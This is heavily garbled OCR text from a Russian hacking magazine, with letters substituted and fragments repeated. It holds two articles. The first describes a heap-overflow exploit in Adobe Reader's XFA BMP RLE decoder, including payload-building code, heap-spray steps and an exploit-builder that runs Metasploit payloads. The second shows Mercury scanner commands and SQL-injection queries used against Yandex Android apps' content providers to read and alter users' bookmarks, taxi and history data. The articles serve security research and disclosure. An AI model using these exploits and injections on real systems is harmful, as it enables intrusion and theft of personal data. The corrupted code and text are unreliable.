ременная зігеат — это файл, откуда был прочитан ВМР-заголовок, включая 
высоту и ширину. Основное назначение функции — раскрыть сжатые ВІ_Е- 
данные. 

Для начала выделяется достаточно памяти, чтобы поместилось полное 
изображение. Затем считывается каждый байт, чтобы определить, в каком 
режиме находятся данные: Н1_Е, идет повторение байтов указанное коли- 
чество раз, или «чистом», и происходит переключение между различными 
опциями: 

• 0 — конец строки; 

■ 1 — конец файла, завершить выполнение; 

• 2 - разница (сіеКа), сдвигаем указатель записи (то есть пропускает пус- 
тые блоки); 

• б (беіоиіі) — обычные данные, копируем как есть. 

Если присмотреться внимательнее, то можно заметить, что при опции 2 нет 
проверки полученных данных с помощью функции аззегЬ Благодаря этому мы 
можем сдвинуть указатели на произвольную длину, что позволит нам выйти 
за границу буфера текстуры. Тем не менее далее по коду при попытке записать 
что-либо в буфер происходит проверка: 

сІе~Раи11: : // Копирование 

азгегі: ( уроз < && стсі. ѵаіие + хроз <= міс Ші ) ; 

Обратим внимание на раздел сазе, в котором можно вызвать состояние 
переполнения кучи. Допустим, мы постоянно шлем команду разницы, про- 
двигающую переменную хроз. И если мы будем продолжать это делать без по- 
пытки записать что-либо, размер хроз может стать очень большим, например 
ОхШШОО. В результате у нас будет ВМР, содержащий ОхРШТЮО/ОхГГ команд раз- 
ницы, и каждая из них будет увеличивать хроз на ОхТТ : 

Ьтр += 1 \х00\х02\хТ1Р\х00 1 * ( (ѲхТТТТ'Р'Р'Р'Р-ѲхРТ) / ѲхТТ) 

После заполнения мы передаем команду на копирование СМТ байтов на- 
прямую из файла по указанному адресу. Нотаккакхроз+Іеп(рауІоаб) заполняет 
представление 32-битного целого числа, при этом утвержденная граница со- 
храняется и переполнение становится возможным. 

Ьтр += ’ \х00\хѲ2 '+сЬг(Ѳх100-1еп(рау1оас1) )+ ' \х00 ' 

Ьтр += ' \х00 '+сЬг(1еп(рау1оас|) )+рау1оасІ 

В результате, используя этот баг, мы можем переписать 256 байт перед бу- 
фером с текстурой. Теперь рассмотрим нюансы эксплуатации и запуска про- 
извольного ІаѵаЗсгірІ. 

ЕХРЮІТ 

Размер кучи, выделяемой для текстуры, равен ширине и высоте найденной 
в ВМР-заголовке. И так как мы контролируем эти размеры, то можно обду- 
мать, чем полезным заполнить это пространство. Но для начала нужно повы- 
сить надежность и подготовить кучу для серии выделений памяти. Для этого 
мы будем использовать старый добрый метод — ЗаѵаЗсгірТ Он будет выде- 
лять и освобождать части кучи. Это будет выглядеть примерно так: 



Если присмотреться внимательнее, то можно заметить, что при опции г нет 
проверки полученных данных с помощью функции аззегі. Благодаря этому мы 
можем сдвинуть указатели на произвольную длину, что позволит нам выйти 
за границу буфера текстуры. Однако дальше по коду все же происходит проверка 
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Схема 3 
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Текстура 



Р : \ыогк5\Хакер\Х_Ѳ7_2Ѳ13_Ѵ2И)М_ЕХР10ІТ5>ХРА8МРЕхр1оі1; , ру -Ь 
1)5а§е: ХРАВМРЕхрІоі^.ру [орТіопз] 

А8оЬе Кеасіег X 10.1.4 ХРА ВМР КЬЕ Ехріоіі 

0р1іоп5 : 

-б, --Ьеір зііоы ІРііб Ьеір шезза^е апсі ехі! 

--сіеЬи§ Рог гіеЬиееіпе 

- -т5ррау1оа8=М$РРАѴІ_0А0 

Ме1а5р1оі1 рауіоасі. Ех. 'ыіп32_ехес СМО=са1с ‘ 

--рау1оа8=РАѴШАО 

— сіос Ргіпі: сіеіаііегі сіоситеп^аііоп 



Пример запуска конструктора для ХРА-зксп лойта 



Схема 4 



Свободная 

ячейка и8-строка 




Предыдущая 

текстура 



Схема 5 



Свободная 

ячейка 



иЗ-строка 




ітд5{гисі{...} 



Схема 6 



жащий ѵІаЫез* Это нужно, чтобы мы узнали расположение некоторых ОІ_І_ 
из интерпретатора* Поэтому размер ячейки должен выбираться очень 
тщательно, чтобы это случилось автоматически и интересующий нас объ- 
ект распределился туда, куда указывает одна из строк из {схема 5}* 

5. Теперь прогоним все 4аѵа8сгір{- строки, чтобы найти ту, которая была из- 
менена: 

Тог (і=Ѳ ; і < зргау . зііе ; і +=1) 

ІТ ( 5р гаѵ. х[і] ]= пиіі && 

з рта ѵ.х[1] [0 ] 1= ПЦ5 858 "){ 

« т ■ 

> 

б* Если найдено, то парсим содержимое и ищем адрес АсгоПб32.сІІІ: 

асго = (( и1= і1.упраскА1=(5ргау>х[і] , 14) >> 16) - оТТбѳТ) << Ібі 

Ьгеак ; 



Свободная 

ячейка 




іплд8ІгисІ{...} 



Схема? 



Новая иЗ-строка 



Схема 8 




Новая ^-строка 



Новая иЗ-строка 
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ітдзі:гисі:{...} 



Схемы 1 -8 



1 . Выделяем 1000 0х12С частей контролируемых данных (схема 1 ). 

2. Освобождаем одну часть через каждые десять ранее выделенных, то есть 
генерируем несколько «нор» (дыр) (схема 2). Далее наша задача — полу- 
чить несколько указателей в баѵаЗсгірІ-интерпретатор, чтобы можно было 
обойти А51_Н и РЕР. Чтобы сделать это, загрузим неправильное ВМР- 
изображение и повредим часть [_РН-кучи. Распределитель памяти будет 
думать, что строка в памяти с выполняемым баѵаЗсгірІ свободна. 

3. Загружаем неправильное ВМР-изображение с размерами {1, 0x120}, 
это и будет нашей пиксельной текстурой, которая распределится в одну 
из наших «нор» (схема 3). 

4. Исключение в ВІ_Е-декодере будет удалять все используемые структу- 
ры. А в данном случае часть кучи с текстурой будет освобождена. Но так 
как заголовок поврежден, удаление коснется предыдущей части и тек- 
стура останется одна. Данная неправильная ячейка может быть спокойно 
использована баѵаЗсгірІ-интерпретатором. Более подробно о такой тех- 
нологии можно прочитать тут: ЫМу/2сгХОк (схема 4). После этого у нас 
будет баѵаЗсгірІ-строка, использующая память, которая должна быть сво- 
бодной. Распределение размером в 0x120, возможно, будет назначено 
в ту же память и накладываться на баѵаЗсгірі В связи с этим нам нужно 
нацелить 33 на распределение в ту часть памяти, где есть объект, содер- 



После этого у нас будет строка, которая находится в памяти с ітдзігисі 
и указывает на адрес АсгоНб.бІІ для 33- интерпретатора. Далее рассмо- 
трим процесс перезаписи структуры. В баѵаЗсгірІ: строки не так-то просто 
перезаписать. Для этого надо освободить старую и создать копию новой 
с нужными изменениями. Обычно если новая строка имеет схожий раз- 
мер со старой, то она будет распределена в то же место. Поэтому, изме- 
няя объект, нам нужно освободить выбранные строки и перераспределить 
их в ту же память с небольшими изменениями. 

7. Освобождаем выбранные 33-строки (которые делили память с объектом) 
(схема 6). 

8. Создаем новую строку длиной 0x120 с желаемыми данными, используя 
полученные адреса, и спрей, который нужно расположить выше наших 
данных (схема 7). 

9. Распределение нескольких новых строчек с новыми данными (схема 8). 

В итоге объект будет заменен на один из указателей на ВОР-цепочку. 

Для контролирования выполнения кода нужно будет вызвать функцию бос. 
сІозе() в 33-интерпретаторе. Она выгрузит все загруженные ХРА-изображения 
и будет использовать перезаписанную ѵІаЫе. Таким образом, перезаписан- 
ные указатели будут еще раз использованы в деструкторах, и контролируемые 
данныебудутперехвачены. Последним пунктом предполагается, что указатель 
на беар зргау будет со знакомым адресом. В более продвинутых (оригиналь- 
ных) техниках, в которых другие части кучи указывают на интерпретатор, этот 
пункт не понадобится. 

Для реализации эксплойта автор написал свой конструктор на Руібоп (ЫЪ 
Іу/11т№Е) (о подобных конструкторах я немного рассказывал в своем вы- 
ступлении на РНЮауз 2013). При запуске в *піх-системах в качестве шелл- кода 
можно использовать модуль из Меіазріоіі тзірауіоаб, он же используется 
по умолчанию. Для запуска изѴѴіпбоѵѵз нужно будет указать полезную нагрузку 
через опцию командной строки --рауіоасі. Например: 

ХРАВМРЕхрІоіѣ . ру -- ра уі оаб саіс . Ьіп 

В результате у нас будет РОР-документ, запускающий калькулятор. 

ТАПСЕТЗ 

Э кспл о йт есть только под Аб обе Веабег 1 0- 1 0 . 1 . 4 , н о ХРА-фо рм ы испо л ьзу ются 
с версии 8. 

50ШТІ0Ы 

Доступно обновление с исправлением данной ошибки от производителя. Так- 
же для быстрого патча предлагается удалить файл АсгоРогт.арі. ЛС 






Взлом 
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ИЩЕМ УЯЗВИМОСТИ В АШКОЮ-ПРИЛОЖЕНИЯХ ЯНДЕКСА 

Мы уже рассказывали в журнале, как можно заработать на создании своих мо- 
бильных приложений тысячу долларов и больше. Сегодня же рассмотрим, что де- 
лать, если ты хочешь стать не просто разработчиком, а исследователем, и заодно 
продолжим серию статей про анализ багов в АпбгоісІ-приложениях. В мартовском 
номере была статья «Слабое звено» от представителей Яндекса, посвященная кон- 
тент-провайдерам и созданию своего приложения для анализа таких мест в про- 
граммах. Именно такие уязвимости и были найдены мною. 



Борис Рютин, 
ЦОР (ЕзадеІ.аЬ) 



ИНТРО 

Мониторингом новостей в мире безопасности АпсІгоісІ я занимаюсь довольно давно 
и в марте 2012-го прочитал статью, посвященную уязвимостям в приложениях ( зіі, 
Іѵ/ІѴК 5 ). Прочитал, попробовал и забыл. Но со стартом нового конкурса «Охота 

за ошибками» ПэіІ.Іѵ/Т ІаІр5 ) от Яндекса, да еще с пометкой, что они добавили в про- 
грамму мобильные приложения, пришлось вспомнить. 

Теорию про уязвимости в контент-провайдерах приложений мы разобрали в од- 
ном из прошлых номеров, поэтому заново ее приводить здесь не буду. Напомню лишь 
вкратце, что контент-провайдер — это поставщик данных. Каждое приложение может 
создавать свой конте нт -провайдер, который будет зарегистрирован ОС после уста- 
новки приложения. Проблема здесь кроется в том, что многие разработчики не уделя- 
ют должного внимания безопасности, и в результате в системе появляются контент- 
провайдеры, полностью открытые на чтение и запись, не говоря о том, что многие 
провайдеры уязвимы к 3<ЭІ_-инъекциям. Такие вот провайдеры делают возможным 
несанкционированный доступ к персональным данным. Если интересуют детальные 
подробности — можно изучить указанную выше статью, мы же оправляемся на охоту 
за багами. 

НАБОР ПАЦИЕНТОВ 

Для анализа мобильных приложений я использую реальное устройство — планшетный 
компьютер І_епоѵо К1 . Связано это с тем, что во многих моделях телефонов объем вну- 
тренней памяти ограничен, из-за чего нельзя поставить большое количество прило- 
жений. Также можно использовать эмулятор из АпсІгоісІ ЗОК, но тогда надо установить 
на него Ооодіе РІау или найти АРК-файлы приложений. 

АРК можно получить несколькими способами: 

* перенести с устройства на компьютер, с помощью АЭВ (см. врезку); 

* воспользоваться скриптами с неофициальным АРІ (см. врезку); 

* установить шаманским образом Соодіе РІау на эмулятор ( ! ѵ/13 р ) ; 

* скачать с сайтов, например 4рсІа.ги («крякнутые» для ознакомления) и іогиіп.х сіе 
беѵеіорегз.сот {бесплатные и ореп зоигсе). 



Установить приложения в эмулятор можно двумя способами: 

* через 0ЭМ8 в Есіірзе кнопкой «іпзіаіі арріісайоп»; 

• через АЭВ командой «асІЬ іпзіаіі арр.арк». 

Что касается подопытных, то исследовать мы будем сегодня 
мобильные приложения от компании «Яндекс», которых стано- 
вится все больше и больше. 



М ЕВСІЖѴ - ВЕСТНИК БАГОВ 

Хорошо, с пациентами разобрались. Теперь посмотрим, 
что за зверь Мегсигу ( ІаЬз.тѵі/гіпІЪзесигііу.сот ). Этот сканер 
уже не раз упоминался на страницах журнала. В данный момент 
доступна версия 2.2.0, но я до сих пор использую иногда версию 
1.+, хоть и установлены обе. В новой версии разработчики объ- 
единили все разделы и назвали их модулями, плюс в ней были 
баги в выводе информации из заполненных таблиц (некоррек- 
тно выводилась информация на русском языке). Так что первая 
версия, на мой взгляд, проще и удобней в использовании, по- 
этому рассматриваемые примеры будут основаны на ней. Итак, 
скачиваем архив (ЬіЪІу/МшЮф ) или берем его с нашего диска 
и видим, что программа состоит из двух частей: 

* клиент — РуМюп-программа, которую запускаем на компью- 
тере (успешно работает как в І_іпих, так и в ѴѴіпбоѵ/з) 

• сервер (в версии 2.0 сервер переименовали в агент) — АРК- 
приложение, которое можно установить любым из спосо- 
бов, описанных выше. 



Для соединения клиента и сервера нам понадобится ІР- 
адрес устройства. В случае если используется эмулятор, надо 
предварительно сделать переброс портов командой: 
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С : \и5ег5\гоо^\0о1-1п1оас15\^ооё1ер1ау“ар1-та51:ег\^оое1ер1ау-ар1-та5;1:ег>5еагс11.ру уапсіех 
Тіііе; Раскате папіе;Сгеа1ог;$ирег БеѵіРгісе^О’Р-Рег Туре;Ѵег5Іоп СосІе;5І2е;Ка1:іпе;Г1ит ОоыпІоа^Б 
Уапсіех * Марз ; ги . уапсіех . уапсіехтарь ; іиі ] ЦІЧ 1 ||тВ;і;Ргее]1;3 1 2і11.2№;4*52;5,Ѳ0Ѳ,ѲѲѲ+ 

Уапсіех. Ма іі ; ги. уапсіех * шаіі ^ЦуБ;!^ гее; 1; 179; 3*ЗМВ;4_ 51; 1,000,000+ 

Уапсіех. 5еагсЬ; ги_ уапсіех _5еагсЬр1и§іп;^п^-®Ц^^[|уБ;1; Р гее ; 1; 200311; 3_9МВ;4. 48; 1,000,000+ 
Уапсіех, БЬеІІ; ги . уапсіех . 5Не11;^п^-^]-^ ^ 

Уапсіех . Маѵі^аіог; ги .уапсіех. уапсіехпаѵі; 

Уапсіех. Меіго; 

Уапсіех. Магкеі 

Уапсіех, ЫеаІЬег; ги. уапсіех. меаІіИегрІиеіп 



=р6;1; Ргее; 1; 21067; 19. 1МВ;4. 24;1, 000,000+ 
П іиііІ|і1^1]| тБ;1; р гее . 1;1 30 1;1 2.адв;Д.28;1,000,00Ѳ+ 
ги. уапсіех. теіго;-^ 1 -^ ^ ^|уБ;1; Ргее;1;164;2,0МВ;4. 76;1, 000,000+ 

; ги .уапсіех. тагкеі^п^^- ^-^||уБ;1;Ргее;1;120;б, ЗМВ;4 Л5;1,000,0ѲѲ+ 

Т Б; 1; Ргее; 1; ЗѲѲ; 5 . ЗМВ;4. 24; 1, ©09,000+ 



г >т° ^ -* г 
,1 П І!ІІ|І1 



1 



Уапсіех. 0І5к;ги. уапсіех. 1;Р гее; 1; 114; 3. 0М8;4. 55 ; 100,000+ 

ѴапдехЛгаіііс иісі^еі:; ги. уапсіех. уапгіехѣга^^іс^п^^^^ІуБ;!; Ргее;1;107;318. 5К8;4_37;1, 000,000+ 
Уапсіех. Кіпоа-РіаКа ; ги. уапсіех. а-РійЬа^п^-^-І^^ІІуБ;!^ гее ;1; 111; 324. 1КВ; 4. 11; 500,000+ 



Уапсіех. Мопеу; ги .уапсіех .шопеу;^п^^ і Ч- и '||уБ;1; Р гее; 1; 1910; 1 . 7МВ;4.42; 100,000+ 

Уапсіех. Тахі;ги. уапсіех. Іахі^п-^ 1 ^-^- уБ;1;Ргее;1;8;4.2ИВ;4. 38; 100, 000+ 

Уапсіех. Орега Міпі;соп].орега,пііпі.апсІгоісІ.уапсіех;^п^ І -^-^=|^||уБ;1;Ргее;1;23;902. ЗКВ;4.45; 500,000+ 

; Л л іиіЛ_[ Ц і|| т б * і і Ргее;1; 130 



Уапсіех Орега МоЬі1е;сош.орега.Ьгои5ег. уапсіех 



Уапсіех. Меі^ ші<іее1;ри.уап4ех.пеи5;^п^^Ц^ ^||уБ;1;Ргее;1;110; 59 5. 8КВ; 3.87; 100,000+ 



1301Ѳ71639 ; 9 . ЗМВ ; 4 . 49 ; 500 , ѲѲ0+ 



Уапсіех .Тгаіпа; ги .уапсіех . га5р;-^п-^^- 
Уапсіех. Ро1:кі; ги. уапсіех. -Роікі^п-^'-^- 




уБ;1; Ргее;1;210;1.7МВ;4.63; 500,000+ 
уБ; 1; Р гее ; 1; 201; 1015, ЗКВ; 3.55; 100, 000+ 

Уапсіех. Аи1:о; ги. уапсіех. аиіго^п^-^-Ц-^ІуБ;!; Ргее; 1; 102; 2, 7Ш; 4. ЗѲ; 100, 000+ 

Уапсіех Тгап5Іа1:е;сот. і§1а. уапсіех. Ѣгап$1а1:е;1оог Іа5Нкоѵ;0; Ргее;1;8;3-8ИВ;4.64;1Ѳ,0Ѳ0+ 




\ѴАІШШС 

Информация 

предоставлена 

исключительно 



Результат команды *#*#8255#*#*, Яндекс-программы в Соодіѳ РІау 

гдѳ показан А тЗ го кН О 



асІЬ ^огѵѵ/агсі +ср ; 314 1 5 бср: 31415 



согѵЬегѵЬ іУ/ги . уапсіех . уапсІехтарБ .тар. місІёе^Б . ИСоттипі1:уМоосІРгоѵісІег/торсІ 



Соответственно, ІР-адрес для сканера будет 
127.0.0.1. На реальном устройстве достаточно в списке 
ѴѴі-Рі-сетей просто кликнуть по текущей подключенной 
сети, и появится всплывающее окно с подробной инфор- 
мацией о качестве, типе безопасности и нужном нам ІР- 
адресе. 

Перед тем как запустить на компьютере клиент, 
на устройстве нужно запустить приложение-сервер 
(агент) и перевести переключатель в положение «Вкл» 
(Оп). В версии 1+ это единственная опция, в версии 2+ 
добавили возможность шифровать трафик, запаролить 
подключение и другие. 

руЫіоп тегсигу.ру 

# Коннектимся к устройству 

*тегсигу > соппесЬ ІР 

# Список команд 

*тегсигу > Неір 

# Выбираем раздел контент-провайдеров 

*тегсигу > ргоѵісіег 

# Позволяет найти провайдеры приложения 

*тегсигу#ргоѵісІег>1іпсІигі ги . Бііе . арр 

# Позволяет сделать Беіесіі-запрос к провайдеру 

*тегсигу#ргоуісІег>яиегу согі'Ьеп1:і//соп1:еп'1; . арр 

С помощью таких запросов можно получить все данные 
таблицы, изменить, если хватает прав, и провести 8СН_- 
инъекцию, которая позволит получить всю БД. 

Ну что ж, основы мы разобрали, теперь примемся 
за сами баги. 

ЯНДЕКС. КАРТЫ 

Обзор уязвимостей начнем с популярной программы — 
Яндекс. Карты. Во время тестирования версия у програм- 
мы была 3.02, сборка 2945. 

С помощью команды Ііпсіигі попытаемся спарсить кон- 
тент-провайдеры: 

^ппсіигі ги .уапсіех. уапсІехтарБ 

и получаем список (он больше, оставил только уязвимые): 

соп~Ееп~Е : //ги. уапсіех. уапсІехтарБ . ЬгапеІіп§ .->-> 

теёа‘Роп.Меёа'РопСоп1:ас'Ь5РгоѵісІег/те§а1 : оп_соп'Ьас'1:5 



сопрей! : / / ги . уапсіех . уапсІехтарБ Лэгапсііпё . пгЕ б .<-і 
М1:5Сопбас1:5Ргоѵісіег/т1:5 сопІасбБ 



сопбеп1:і//ги. уапсіех .уапсІехтарБ . гоибеБ . КоиѣеНІБ'ЬогуРгоѵісІег/.гои'ЬеИІБѣогу 



сопбеп1:1//ги^уапс1ех. уапсІехтарБ . иБегБроіпѣБ .УБегРоіпІБСотгпепІіБРгоѵісІег/*^ 

ироіп1:55и2§ 

Наибольший интерес представляет контент-провайдер, ответственный за закладки пользо- 
вателя, — соЩеп{://ги.уапсІех.уапсІехтарз.ІаЬеІ5.ЦаЬеІ5РгоѵісІег/туІаЬеІ5. Ведь мы можем изме- 
нить ему координаты! Получаем все сохраненные закладки: 

Ч.иегу со п1:еп'Е://гц .уапсіех .уапсІехтарБ . Іа Ьеі б , І аЬеІБРгоуісІег/туІаЬеІБ 

§еососіе 1аЬе1_пате_1:о1омег Іоп сіа+е ІаЬе І пате ісі 1а+ 

Москва^ МеигопБрасе. ги 37.5732 1352196244367 Nеигоп5расе..ги 1 55.7137 

Рос сия . 

Лужнецкая 

набережная^ 

2/4с17 

Москва^ Ыогк 37.5732 1352196427356 Ыогк 2 55.7137 

Россия^ 

Лужнецкая 

набережная^ 

2/4СІ7 

Изменяем: 

ирсіаісе соп'ЬепІ: : //ги . уапсіех . уапсІехтарБ . ІаЬеІБ . ІаЬеІБРгоѵісіег/т уІ аЬеІБ ^ 

- - 5 І:гіп§ 1аЬе1_пате_1:о1омег=Ноте 1аЬе1_пате=Ноте "ЫИеге і с! = 2 

диегу соп^епі:: //г и .уапсіех . уапсІехтарБ .ІаЬеІБ . ІаЬеІБРгоѵісіег/туІаЬеІБ 
§еососіе ІаЬе^пате^оІо^ег _1оп сіаіе 1аЬе1_пате ісі 1а+ 

Москва, МеигопБрасе. ги 37 ..5732 1352196244367 МеигопБрасе . г и 1 55.7137 

Россия, 

Лужнецкая 

набережная, 

2/4СІ7 

Москва, Ноте 37.5732 1352196427356 Ноте 2 55.71 37 

Россия, 

Лужнецкая 

набережная, 

2/4с17 

Как видим, на закладке были координаты работы — стали дома. 

Что может сделать атакующий в этом случае? Давай пофантазируем. Например, человеку 
дали координаты места, где он должен заплатить кредит или куда просто привезти деньги. Ата- 
кующий меняет этот адрес и ждет его там :). 

ЯНДЕКС. ТАКСИ 

Следующая наша жертва — Яндекс.Такси. Уязвимая версия была под номером 1 .80, сборка 365. 
Как и в случае с Яндекс. Картами, ищем контент-провайдеры: 



соп-Ьепб іУ/ги. уапсіех. уапсІехтарБ . ІаЬеІБ бпсіигі ги .уапсіех. іахі 

ІаЬеІБРгоѵісіег/туІаЬеІБ 




в* 



Взлом 
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согѵЕ епі іУ/ги . уапсіех .іахі/іахі 
сопрей! і//ги . уапсіех ^фахі/сІе1ау_огс1ег 
соітЬепІ: : // г и . уапсІех.іахі/Іііз'Ііогу 
сопіепі і//ги . уапсіех .іахі/сіііе5_иі , 1:І'і_аігрог'1: 



Пример данных из таблицы сіеіауогсіег: 

рагк_р1іопе сіе 5 с рагк _іс ! ісі рагк__1о§о рагк_пате іагіТТ_іс1 зге огс!ег_іс1 



Или более интересный провайдер соп1епІ://ш. уапсіех. 1ахі/сШез_ѵѵі1:Іі_аігрог1, в этом 
случае, в отличие от сіеіауогсіег, возможно полное раскрытие БД через запрос "* РВОМ 
здІі1е_таз1ег— 



іуре 


пате 




іЬІ пате 


гооіраее 


5ЦІ 


іаЬІе 


апсігоісі 


теіасіаіа 


апсігоісі те'Ьасіа'Ьа 


3 


СВЕАТЕ ТАВІЕ 












апсігоісі теіасіаіа 


(Іосаіе ТЕХТ) 


іаЫе 


сі'Ьу 




сііу 


4 


СВЕАТЕ ТАВІЕ сііу 



( ісі ІІЧТЕСЕВ 

РВІМАВѴ КЕУ Л пате 



ТЕХТ, зеагсІі_пате 

ІЕХТ) 

ѣаЬІе Іахі ѣахі 5 СВЕАТЕ ТАВІЕ іахі 

( ісі ІІЧТЕСЕВ 
РВІМАВѴ КЕУ,1;ахі_ 
ісі ЮІЧС., 1оса1ііу_ 
пате 

ѴАВ.СНАВ(50) л пате 

ТЕХТ Л рЬопе 

ІЕХТд игі _ІЕХГ) 



Помимо этого, не было запрета на изменение данных. Например, можно было поме- 
нять номера машины, мобильного и другую информацию о ближайших к пользователю 
такси в таблице Іахі. 

Также был доступ к таблице Ітізіогу, в которой можно было узнать историю как поис- 
ка, так и вызовов. Информация такого рода понадобится не каждому злоумышленнику, 
но каким-нибудь ревнивцам или частным детективам может быть интересной. 

ЯНДЕКС.ЭЛЕКТРИЧКИ 

Следующая уязвимая программа — Яндекс. Электрички. Здесь тоже была обнаружена 
уязвимость типа ЗОБ-инъекции в БД с возможностью изменения данных. 



С : \Р^І:Ьоп 2 ?Ч 8 сгір^ 5 >ру^Ьоп пшгсигу сопзоіе соппесі — вегѵеі* 172 , 44 . 4*64 



•ѵ я 0 ■ ш * « ш » Ф * Л а т » Ы }ів 

аѵ * ,уте^аІЬЬа'Ьроі . „ зо 
- 1сІі;}іеЬеауу * 

. , ійСІіеЬеаѵупе<:л1І:1іа1:роізопе(і^: - 
. Ііейі-о ійЕЗгіеКеаиуіпеЁаІъГіаЪроізопе . . 

* * * ,о ісНіІісЬеау уте, * 

„ Ъро ізопе . ісІѢІіеЬеа . .. ууіле^аіѣ ,, 

і . ЬаЪро ізопейЬЬейго ігі^ЬеЬеаѵуте^йІіІіаЪ * 

.опейіЬейі'оійІ: ЬеЬеаиугп&ЬаНіЬаіро ізстей: 

, ІгЬейго ійі; ЬеЬеаѵуліеІаІІ: Ьа^ро ізо п ей^ііе с! . 

ЗеІесЪіпд 3?ГГсеЪеЪ94са34Ѳ СЬЕМОиО К1 4Л.І> 

Мврсш*у Со изо 1с 
тегсил\у> Ііеір 

Иеі'сигу: 4Ье Неаму Не^аі Роізопесі ЪІіе Ргоій 

Туре *}*е1р СОМИЙКШ' гюі'С хпГагтаі хоп оп а ра*Ч хсиіаг соттапА, ©** *Ье1р 
КОШІЛГ Рог а раі^ іеідіаі* пойиіе . 

Со тпапАз : 

ей солЪгіЬіі^огз ехіЪ Ііеір ІізЪ 1оа4 пойиіе гип зЬеН 
твгсш*у> 



Стартовое окно программы Мегсигу версии 2. 1 .0 



Р : \50РТ\апсІгоісЗ_ге5еагсІі\тегсигу-ѵ1 Л\с1іепі>тегсигу ,ру 



. Л*. Л*. 




л., лгпппш-* ЛІ 

ЛШІІІШШІПШ. . 

- . ЛІІІІІІІІІІІІІІІІІІІІІІІІІІ: . 
ЛІІІІІІІІІІІІГІІІІІІІІІІІІІІІП.. 

- лит, ..діііііііііш, . * ,іііііі. 

. ?ІІІІІІІ. ЛІІІІІІІІІІІІІІ* ЛИНІИ. 

ЛІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІ* 

ЛІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІ: 

ЛІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІІ 

ТКе Иеаѵу теііаі ■ЬЬаіг роІБОпес! і:Ье сіпоісі 

тегсигу> еопиесі: 192.168.0,107 
*тегеигу> Кеір 

СотталсІБ - Іуре Кеір <сотптпеі> іог тоге іпіо 



асііѵіѣу Ьгоагісазі: ехіі: тосІоІеБ раска^ѳБ Бегѵісе Ѣооіб 

Ьаск сІеЬи§§аЫе Кеір паііѵе ргоѵісіег БКеІІ 

^тегсигу> т 



Стартовое окно программы Мегсигу версии 1.1.0 



^ие^у сопіе пі: : //г и . уапсіех. г аз р/ЯІе а -^ррозесЬіоп "* РКОМ ^ 
здііііе^азіег- - " 

ѣуре пате іЬ1_пате гоо^ра^е 5^1 



іаЬІе Іііез ^ііез 4 СКЕАТЕ Т АВІ Е Яіез 

(_іс1 іпіе^ег ргітагу кеу 

аиіоіпспетепід еіа^ іехід 
1азі_тос1і1іес1 "Ьехіід пате 
іехід ге д іоп іехід 
1аз1:_и рсІа1: е с1 1о п § ? ЦМрЦЕ 
(пате)) 



Для примера изменения данных поменяем путь к кешу файлов: 



ирсіаіе срггЬепІ: ://ги .уапсіех. газр/іпіез ^-з1:гіп§ пате ^ 



"/зузіет/БсІсагсІ/Ііаск.ІіхІ;” - 


-міпеге ісі— 2 






ісі еіае 


Іазі тосіійесі пате 


гееіоп 


ІаБІ: ирсіаііесі 












2 9ЬсЬс1с0620 


пиіі 


/зуБІіет 


213 


13524627058Б4 


аТБѲеасІеасІ 




/зсісагсі 






14ссІее81а1 




/баск.'Ьх'І: 






СІѲСІ08Т0259 


1 548-Р13С285 


пиіі 


/ сі а*Ь а / сі а 1: а 




1352462705064 


590с4Ьс8с1Т : 




/ги. уапсіех. газр 






665613сІ2с18 




/сасіпе 






0е7Ье4678а 




/аіі сіѣіез . сасИе 







Благодаря этой уязвимости злоумышленник мог бы читать и изменять списки люби- 
мых и недавних станций. Также изменение пути до кеша могло «уронить» приложение или 
поменять расписание, если у пользователя отсутствовал в этот момент интернет. 




Окно серверной части на устройстве 



СЕРИЯ 0ДН0ТИПНЫХУЯЗВИМ0СТЕЙ 

Под таким заголовком будет одна уязвимая таблица, которая 
была найдена во всех приложениях. Как я понимаю, был напи- 
сан код, который помогал в идентификации клиента, и его до- 
бавили во все приложения. Первая программа с такой уязвимо- 
стью — Яндекс. Почта. 

Пример отдельного вызова к таблице сіеѵісе ісі: 



соп^епі: ://ги .уапсіех .сіеѵісе .ісі . таі1/сІеѵісе_ісІ 



ісі 


мк.«/ / в и « у и і і и и л • ѵ ѵ. ■ -і. и ■ ши х х / и ѵ ѵ ^ -к. и 

сіеѵісе ісі 






1 


с10224а1461111111111111111сІаес1Ь5 
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Или можно получить всю структуру, добавив в запрос наш любимый "* ГРОМ здіііе 
тазіег--”: 

ѣуре пате іЬІ пате гооіра§е зді 




іаЬІе апсіпоіс і те'Еаб а'Еа апбгоіб_теіаба1:а 3 СКЕАТЕ Л'АВІЕ 

а лсі го ісі теі: асЗаі; а 

(Іосаіе ТЕХТ) 

іаЫе беѵісе_іб сІеѵісе_ісІ 4 СКЕАТЕ ^ГАВІЕ 

беѵісе_іб ( ісі 
ІЖЕСЕК РЙІМАКУ 
КЕУ,,беѵісе_іб ТЕХТ 

ЖЩЦЕ) _ 

іпбех _$_д1і1:е_аи1оіпбех беѵісе_іб 5 _пи11 

сіеѵісе ісі 1 



1 . Проверяем наличие устройства 
асІЬ сіеѵісез 



2. Все установленные приложения хранят свой 
«установщик» в папке /баіа/арр, поэтому ска- 
чиваем: 

абЬ риі 1 / б афа/ а р р/ ги .уапбех .-^ 

уа п б ехт а рз -І.арк С : \ 



При общении с представителями безопасности Яндекса выяснилось, что уязвимость 
возникла после обновления, так как неправильно выставили права: 

*тегсигу#ргоѵібег> _ігѵРо -Т беѵісе . іб 

Раскате патеі_ ги, уапбех ._таі1 

АиФЬогіФ у: ги ..уапбех. беѵісе . іб .гпаіі 

Кециіоеб РегтІ53іоп_- Кеаб : пиіі 

Кедиігеб РегтІ55Іо п - Ілігііе : ги .уапбех. беѵісе іб. РУН 
бгапі Іігі Регтіззіопз: Еа Ізе 
Ми1ііргрсе55 а11омеб_^-РаІ5е 

Как видишь, напротив прав на чтение стоит значение пиіі. Это и позволяло другим пользо- 
вателям обращаться к этой таблице. Кроме того, не было фильтрации запроса, что позво- 
лило произвести инъекцию. 

Следующая программа — Яндекс. Навигатор с этой же проблемой. Обращаемся сразу 
к уязвимому провайдеру: 

соітЕ еггЕ : //ги . уапбех . беѵісе . іб . паѵі/аиФЬогіфу 

фуре пате ФЫ пате гооФра§е зді 



ФаЫе апбгоіб_теФабаФа апбгоіб_теФабаФа 3 СГСЕАТЕ ІАВІ.Е 

апбгоіб_теФабаФа 

(Іосаіе ТЕХТ) 

фаЬІе беѵісе_іб беѵісе_іб 4 СКЕАТЕ ЛАВІ.Е 

беѵісе_іб ( іб 
